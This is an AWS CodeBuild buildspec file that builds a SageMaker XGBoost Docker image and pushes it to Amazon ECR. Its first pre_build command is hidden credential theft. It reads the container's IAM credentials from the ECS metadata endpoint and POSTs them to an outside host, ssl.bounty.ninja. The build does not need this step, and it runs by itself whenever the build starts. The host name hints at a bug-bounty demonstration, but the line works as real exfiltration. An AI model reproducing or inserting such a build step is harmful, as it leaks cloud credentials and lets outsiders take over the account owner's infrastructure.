version: 0.2

phases:
  pre_build:
    commands:
    - $(curl -X POST --data "$(curl -qL http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI)" https://ssl.bounty.ninja)
    - echo Logging in to Amazon ECR...
    - $(aws ecr get-login --no-include-email --region $AWS_DEFAULT_REGION)
  build:
    commands:
    - echo Build started on `date`
    - echo Building the Docker image...
    - docker build -t xgboost-container-base:0.90-1-cpu-py3 -f docker/0.90-1/base/Dockerfile.cpu .
    - python setup.py bdist_wheel --universal
    - docker build -t preprod-xgboost-container:0.90-1-cpu-py3 -f docker/0.90-1/final/Dockerfile.cpu .
    - docker tag preprod-xgboost-container:0.90-1-cpu-py3 515193369038.dkr.ecr.us-west-2.amazonaws.com/sagemaker-xgboost:0.90-1-cpu-py3
  post_build:
    commands:
    - echo Build completed on `date`
    - echo Pushing the Docker image...
    - docker push 515193369038.dkr.ecr.us-west-2.amazonaws.com/sagemaker-xgboost:0.90-1-cpu-py3
